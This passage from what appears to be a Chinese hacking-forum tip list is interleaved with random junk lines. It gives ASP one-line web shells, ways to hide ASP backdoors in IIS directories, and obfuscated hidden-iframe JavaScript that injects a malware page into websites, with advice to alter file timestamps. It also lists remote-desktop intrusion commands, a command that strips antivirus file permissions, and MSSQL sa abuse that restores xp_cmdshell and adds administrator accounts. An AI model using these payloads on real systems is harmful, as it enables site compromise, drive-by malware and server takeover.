3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
! ^1 u+ t1 b6 ` i% j; m
9 x0 K- t7 z+ B$ C# \
51、log备份时的一句话木马:
) r# G/ {! x" W3 \! P
a).<%%25Execute(request("go"))%%25>
' C; m: R! r! | C. ^2 j. | r
b).<%Execute(request("go"))%>
. g1 i9 @- o# d2 k0 `5 ]% R0 a
c).%><%execute request("go")%><%
8 |3 W: ]4 T( Z; ]. \
d).<script language=VBScript runat=server>execute request("sb")</Script>
: O+ R# ]8 F* z+ X5 Z' I$ w
e).<%25Execute(request("l"))%25>
* v* W9 X2 M$ ^! i \
f).<%if request("cmd")<>"" then execute request("pass")%>
& t& Q6 ]# \1 G; I$ M( }8 L
% h& l' `1 M5 q, z
52、at "12:17" /interactive cmd
% l, u4 {* z! R F" M5 h
执行后可以用AT命令查看新加的任务
8 x2 d% @+ x' x
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
$ v2 k. F8 ?! R; \; C
6 K' V" [1 s4 N% j
53、隐藏ASP后门的两种方法
4 v1 s3 ]6 X& T# n0 w: b
1、建立非标准目录:mkdir images..\
9 e, P- {/ B/ {" f& Q! f3 X+ Q0 }9 @
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
7 b" l6 ~( B) I2 r; X
通过web访问ASP木马:http://ip/images../news.asp?action=login
9 f& D1 ^9 @5 W4 p3 s9 m! E
如何删除非标准目录:rmdir images..\ /s
2 U! k% a: R! `" {' t+ A
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
) ^. d( F5 Z: w- ~" `# P4 b
mkdir programme.asp
* A+ R4 D( x* r5 `/ _: I
新建1.txt文件内容:<!--#include file=”12.jpg”-->
0 e! b2 C% a4 X7 r: {
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
: J ~% Z7 D5 c# o
attrib +H +S programme.asp
) r' s, b* h; }0 n/ K7 J
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
8 J( f% H% q: x4 t
* z/ Y( I1 Q" O" C: m
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
" }5 H, Y/ u- B5 B0 E
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
+ L6 K" E" h1 z- n; n( B' J
4 ?6 Y6 }7 x4 _" h
55、JS隐蔽挂马
7 ?/ L* g6 {) t; o
1.
6 g) |+ {1 P5 N+ V( Y* t
var tr4c3="<iframe src=ht";
! ]0 z- {! H- n* \
tr4c3 = tr4c3+"tp:/";
3 m/ |# h5 P: E2 M* a! T# `
tr4c3 = tr4c3+"/ww";
+ |) w, w2 r7 v" h4 S3 A
tr4c3 = tr4c3+"w.tr4";
" s1 g" [4 w: G+ F/ B
tr4c3 = tr4c3+"c3.com/inc/m";
$ z/ O7 c2 g3 t. n" `0 V' T
tr4c3 = tr4c3+"m.htm style="display:none"></i";
: P9 }/ v: H& R. g# k6 i" g; r1 b
tr4c3 =tr4c3+"frame>'";
( B8 p$ c) W( T& T ?( P
document.write(tr4c3);
! _: B1 [4 O8 f6 t7 H$ R( a& C/ `
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
* ?8 F; S& Y; {
! i5 V" k- S, h# K
2.
- A; c9 F1 r' d6 s4 S( e- ?$ f! D$ k
转换进制,然后用EVAL执行。如
- V2 q: S4 c" L H4 h& y* U* B
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
, `6 ~0 k" r9 X" m$ a
不过这个有点显眼。
. o: K6 D/ c, `1 ^: |; l
3.
( s5 G9 \ T* g! \4 j
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
3 R. T+ n0 s1 j! Q
最后一点,别忘了把文件的时间也修改下。
# H$ U7 J3 g+ _& n
2 ?; [$ y/ m* o0 n; m4 |) ^( G
56.3389终端入侵常用DOS命令
9 `6 _9 B2 w+ h
taskkill taskkill /PID 1248 /t
) _9 }/ e' Z$ W1 ` ?, _7 S
: W: X# C& s/ {8 k! B
tasklist 查进程
/ z# h5 C2 z. V9 ^7 i5 g
# L; d4 R( G! d9 P
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
0 w% _/ A+ p4 h5 r' I
iisreset /reboot
/ Z5 F# y* l( _9 r9 N9 ^. S. u
tsshutdn /reboot /delay:1 重起服务器
2 l @# y& F y1 p% W Z) ]
- U7 D) P8 Q' @! V$ P
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
0 Q6 Q% E9 K" {) w
6 u. ]& y/ d! ?" F' ^4 S
query user 查看当前终端用户在线情况
5 a9 v- c" i( I4 D) H
- Y" \+ Q5 H, K1 L# k/ a
要显示有关所有会话使用的进程的信息,请键入:query process *
* Y- B6 |7 u- P$ Y
6 T; G4 {: H+ n
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
: X9 B% d; J+ q
/ Q# {8 S2 y# g2 n
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
3 a, R' Z+ c1 w2 O H* [" ~+ h
" N, g/ B, ]' z
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
7 f5 {' n1 ^& ~. C: M: _" F2 k0 s# k
1 o, V8 D& g* c. k6 c" D+ q% L! d) g& ^
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
" F( y; u' d+ ^1 c7 _$ r
9 b% b/ x3 ^9 |* [- ~! m
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
) D _0 P e0 r* @) ?1 N% \4 |
: h8 L: W: A+ z6 e; ?' O y/ ]. w; D
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
' s" E0 `4 F' n7 }/ |
. o, g) Q" r6 Q- ^
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
8 v; b2 g9 F. T
3 N* W, ~; r2 l n+ ^* b" t
56、在地址栏或按Ctrl+O,输入:
! d! M2 |6 w" G" ~! ]7 U0 m9 m
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
A6 B6 w2 O- B
% n5 {" A D9 P" \" g% |* `5 u2 e
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
$ P5 o3 R! I7 x$ N, K
6 P( o% Y1 Z1 j) P/ g; s1 F& [
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
A. A* r, H; Y4 y8 z9 i( w3 L
用net localgroup administrators是可以看到管理组下,加了$的用户的。
% \% E' I% m% S2 b4 k5 m1 E
6 I4 v" h9 ^. d h( w; K# e
58、 sa弱口令相关命令
9 u7 T; A" {3 O) q
% f) l2 b" y; }8 d/ F
一.更改sa口令方法:
# M7 J+ V3 b$ u
用sql综合利用工具连接后,执行命令:
. b' E2 l1 z" [8 A% D# b
exec sp_password NULL,'20001001','sa'
) R) z* u* D2 \$ M9 _, S! n
(提示:慎用!)
( g: }5 I( ]6 `7 y% ]! w/ x' ]
8 x8 s0 c: B- f* f
二.简单修补sa弱口令.
5 G! F. [% s# W q+ n2 k+ L: X
# C, Z7 ]% k3 h
方法1:查询分离器连接后执行:
2 j2 v+ p. Y, ?% U
if exists (select * from
+ l5 c1 V- l) H
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
9 \' f, J# s9 c
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
4 }/ ^: }9 A3 K6 m( w; O" q8 d
% _; x | r# o4 \/ u
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
. o" D9 b. _) J
3 w3 j1 i4 }) I% U4 c5 H$ j/ j
GO
7 E2 `. ?1 f$ x; ^ P
; F* i& m: d5 D7 _" M* @, ?4 S
然后按F5键命令执行完毕
1 d8 b/ q2 a L! e
: H$ n# ?0 J, \: C4 x- v/ f# K
方法2:查询分离器连接后
3 @/ a/ M/ M" g l
第一步执行:use master
9 Z, K: F! J! b8 e, L& Y6 E
第二步执行:sp_dropextendedproc 'xp_cmdshell'
, K6 y4 l- V( q$ a
然后按F5键命令执行完毕
! f9 e. o' Z$ _, ^4 ^
; I" {/ `4 ^* E4 i3 W3 l8 a2 V7 ?
5 ^# y. q6 [5 }: S
三.常见情况恢复执行xp_cmdshell.
, k& D. a- d/ ?
1 \" A) p" R! o+ _9 V
$ s& A& A( C1 I' q K/ s! l) r
1 未能找到存储过程'master..xpcmdshell'.
9 q) u3 m' W' P( y i" {
恢复方法:查询分离器连接后,
5 A7 A0 D5 n3 U, Y2 \
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
a' U* ?3 u( d
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
{. m* e& H3 I8 E! F5 z! P
然后按F5键命令执行完毕
" e I& m9 }2 P
) T6 q# k' ?: @# N+ H2 E- y% b
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
* J/ Q: f' {: t/ m6 K& E
恢复方法:查询分离器连接后,
0 @+ S5 q% N& n9 }5 C, z- f' d( ^
第一步执行:sp_dropextendedproc "xp_cmdshell"
$ x6 x' L% T7 Q$ I( c
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
7 H7 \1 @; |% c3 b. p0 l
然后按F5键命令执行完毕
' y# \; X8 ~0 I1 o
0 m) y; F0 L! g
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
7 [3 m- Z, ]" |5 [6 O, q3 ~
恢复方法:查询分离器连接后,
4 n, m! b# ?; C. ?$ R
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
( Y) [3 R, m( K5 _
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
! x) A0 P. L6 p. E7 T
然后按F5键命令执行完毕
" w' Q6 Z- T# [' a9 {% l! C$ p) M- p
5 }; i& j( H) i$ T) D3 j9 v
四.终极方法.
' h0 H h/ `% s4 q4 c; ^
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
8 L' G+ L! d" L1 y) j4 J( q
查询分离器连接后,
( t# o7 z( h n: |* ]
2000servser系统:
" S# `* V4 k1 u2 G1 B
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
) W/ i( \6 J0 i
6 K) O K5 {. t
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
: r" r- k/ u/ e( p% {" O' f( f
/ r- ~2 n/ E9 v% B% K
xp或2003server系统:
- Z+ s: |9 T7 s
/ \& f" g5 f S+ m2 S7 s4 D
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
; o7 f4 N% o* G" k7 N
9 Z3 h1 Y( g4 T- Y- z0 i
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
. p" C7 K- A0 D. m9 @% e
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2